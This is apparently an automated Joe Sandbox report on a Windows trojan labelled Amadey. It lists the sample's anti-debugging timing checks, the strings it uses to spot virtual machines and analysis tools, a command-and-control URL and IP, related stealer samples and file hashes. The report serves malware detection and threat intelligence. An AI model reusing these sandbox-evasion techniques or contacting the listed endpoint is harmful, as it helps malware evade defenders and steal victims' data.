Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE1739 second address: 6FE17CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA6CD35B91Ch 0x00000009 adc cx, 8A48h 0x0000000e jmp 00007FA6CD35B91Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FA6CD35B928h 0x0000001a and ch, FFFFFFA8h 0x0000001d jmp 00007FA6CD35B91Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 or dword ptr [edx+40h], FFFFFFFFh 0x0000002a pushad 0x0000002b pushad 0x0000002c mov cx, DF31h 0x00000030 mov cl, 3Dh 0x00000032 popad 0x00000033 pushad 0x00000034 call 00007FA6CD35B929h 0x00000039 pop eax 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d popad 0x0000003e pop esi 0x0000003f jmp 00007FA6CD35B91Dh 0x00000044 pop ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 mov edi, 10C5C7FEh 0x0000004d mov edi, 65B2660Ah 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE17CE second address: 6FE17F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, 092871F3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d leave 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA6CC859ED0h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE17F0 second address: 6FE17F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE17F6 second address: 6FE17FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE17FC second address: 6FE1800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 7030BAB second address: 7030BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 7030BB1 second address: 7030BEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FA6CD35B921h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA6CD35B91Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FD07F6 second address: 6FD0813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FD0813 second address: 6FD0831 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ah, dh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FD0831 second address: 6FD08D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA6CC859ED9h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA6CC859ECCh 0x00000017 xor al, 00000068h 0x0000001a jmp 00007FA6CC859ECBh 0x0000001f popfd 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FA6CC859ED6h 0x00000027 add esi, 6E63EBC8h 0x0000002d jmp 00007FA6CC859ECBh 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007FA6CC859ED8h 0x00000039 adc ch, 00000028h 0x0000003c jmp 00007FA6CC859ECBh 0x00000041 popfd 0x00000042 popad 0x00000043 popad 0x00000044 mov ebp, esp 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FD08D4 second address: 6FD08D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FD08D8 second address: 6FD08DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FD08DE second address: 6FD08E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FD08E4 second address: 6FD08E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6F70038 second address: 6F7003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6F7003C second address: 6F70042 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6F70042 second address: 6F7005F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CD35B929h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Special instruction interceptor: First address: 97FB81 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Special instruction interceptor: First address: 97D07E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Special instruction interceptor: First address: B44BCD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Special instruction interceptor: First address: B2696F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Special instruction interceptor: First address: BAD95B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Code function: 0_2_00439980 rdtsc 0_2_00439980
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe TID: 768 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe TID: 6856 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Code function: 0_2_0025255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0025255D
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Code function: 0_2_002529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002529FF
Source: 2OJYjm4J1B.exe, 2OJYjm4J1B.exe, 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 2OJYjm4J1B.exe, 00000000.00000002.1871220203.000000000155F000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1868406465.000000000155E000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1844302011.0000000001507000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1868023609.000000000154D000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1867965791.0000000001541000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll": 8O og"
Source: 2OJYjm4J1B.exe Binary or memory string: Hyper-V RAW
Source: 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe File opened: NTICE
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe File opened: SICE
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe File opened: SIWVID
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Code function: 0_2_00439980 rdtsc 0_2_00439980
Source: 2OJYjm4J1B.exe, 2OJYjm4J1B.exe, 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ^}Program Manager
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\2OJYjm4J1B.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic TCP traffic: 192.168.2.8:49705 -> 185.121.15.192:80
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 24 Virtualization/Sandbox Evasion | OS Credential Dumping | 751 Security Software Discovery | 1 Exploitation of Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 24 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 13 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 216 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Source | Detection | Scanner | Label | Link
2OJYjm4J1B.exe | 70% | ReversingLabs | Win32.Trojan.Amadey |
2OJYjm4J1B.exe | 100% | Avira | TR/Crypt.TPM.Gen |
2OJYjm4J1B.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.twentytk20ht.top | 185.121.15.192 | true | false | | high
httpbin.org | 34.226.108.155 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850 | false | | high
https://httpbin.org/ip | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://html4/loose.dtd | 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | 2OJYjm4J1B.exe | false | | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm17345798505a1 | 2OJYjm4J1B.exe, 00000000.00000003.1868687795.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000002.1870769984.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1868847576.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://httpbin.org/ipbefore | 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/http-cookies.html | 2OJYjm4J1B.exe, 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/hsts.html# | 2OJYjm4J1B.exe | false | | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY | 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp | false | | unknown
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850: | 2OJYjm4J1B.exe, 00000000.00000003.1868687795.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1868847576.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://curl.se/docs/alt-svc.html | 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850 | 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.css | 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.jpg | 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmp | false | | high

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.121.15.192 | home.twentytk20ht.top | Spain | | 207046 | REDSERVICIOES | false
34.226.108.155 | httpbin.org | United States | | 14618 | AMAZON-AESUS | false

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579639
Start date and time: 2024-12-23 06:53:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 2OJYjm4J1B.exe
renamed because original name is a hash value
Original Sample Name: 49f7c4981eb383aed2c3f6588545b605.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 4.245.163.56
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 2OJYjm4J1B.exe

Time | Type | Description
00:54:43 | API Interceptor | 50x Sleep call for process: 2OJYjm4J1B.exe modified

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.121.15.192 | ze38hsiGOb.exe | | malicious | Clipboard Hijacker, Cryptbot | | home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
185.121.15.192 | 5wgTw8pA13.exe | | malicious | Clipboard Hijacker, Cryptbot | | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | bwyUxrKbYN.exe | | malicious | Clipboard Hijacker, Cryptbot | | home.fivetk5sb.top/niCGMfnfOxUBXxpLhBBB1734796753
185.121.15.192 | file.exe | | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | | fivetk5sb.top/v1/upload.php
185.121.15.192 | file.exe | | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | | twentytk20ht.top/v1/upload.php
185.121.15.192 | file.exe | | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=uKsqdVCOyF9DZVCd1734801424
185.121.15.192 | file.exe | | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=CmXX9uDEYSg7ov7J1734779763
185.121.15.192 | file.exe | | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | file.exe | | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | | fivetk5ht.top/v1/upload.php
185.121.15.192 | file.exe | | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | | fivetk5ht.top/v1/upload.php
34.226.108.155 | ze38hsiGOb.exe | | malicious | Clipboard Hijacker, Cryptbot | |
34.226.108.155 | file.exe | | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | |
34.226.108.155 | file.exe | | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | |
34.226.108.155 | file.exe | | malicious | LummaC, Amadey, LummaC Stealer, Stealc | |
34.226.108.155 | file.exe | | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | |
34.226.108.155 | file.exe | | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | |
34.226.108.155 | file.exe | | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, XWorm | |
34.226.108.155 | file.exe | | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | |
34.226.108.155 | Set-up.exe | | malicious | Clipboard Hijacker, Cryptbot | |
34.226.108.155 | Set-up.exe | | malicious | Unknown | |
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        httpbin.orgze38hsiGOb.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 34.226.108.155
                                                        5wgTw8pA13.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 98.85.100.80
                                                        bwyUxrKbYN.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 98.85.100.80
                                                        jDSFvyBr1P.exeGet hashmaliciousUnknownBrowse
                                                        • 98.85.100.80
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                        • 98.85.100.80
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                        • 34.226.108.155
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                        • 34.226.108.155
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                        • 98.85.100.80
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                        • 34.226.108.155
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                        • 98.85.100.80
                                                        home.twentytk20ht.top5wgTw8pA13.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                        • 185.121.15.192
                                                        16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                        • 185.121.15.192
                                                        5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                        • 185.121.15.192
                                                        u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                        • 185.121.15.192
                                                        TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 185.121.15.192
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        REDSERVICIOESze38hsiGOb.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 185.121.15.192
                                                        5wgTw8pA13.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 185.121.15.192
                                                        bwyUxrKbYN.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                        • 185.121.15.192
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                        • 185.121.15.192
                                                        AMAZON-AESUSze38hsiGOb.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        • 34.226.108.155
                                                        armv4l.elfGet hashmaliciousUnknownBrowse
                                                        • 54.88.200.107
                                                        loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 54.137.103.116
                                                        loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 54.136.31.230
                                                        arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 54.2.45.144
                                                        sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 3.243.200.233
                                                        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 3.242.220.133
                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 34.201.15.152
                                                        spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 44.205.162.242
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                        • 34.226.108.155
                                                        No context
                                                        No context
                                                        No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.985212880072902
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 2OJYjm4J1B.exe
File size: 4'456'448 bytes
MD5: 49f7c4981eb383aed2c3f6588545b605
SHA1: fa4bf7467762247e1c5933fe25c39875b34703a1
SHA256: 4d44e006134267879fc41b2e837319fbc5b97210ad2ed3902ecfd4fd98af93e7
SHA512: 1583d58bd9d9c1b121a1560d47b6ec26ffbe49323132c9dbfdf7f39cedf4f7fdc3056bc4e5ce39f70c0fea0c5e240dc817c2f057ae3114f8a2e974eaaba9262b
SSDEEP: 98304:YdO34SmsnGHYiIkwtTAm5YcB0dcskIb7KQ16uBUF:YU4HsDiIxVAvcBUcq7KgUF
TLSH: B22633225FF800D4D9D6CCB27A8E5326E3B07B0383D81DA966035A36C67978697BDF41
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@..................................MD...@... ............................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x106b000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
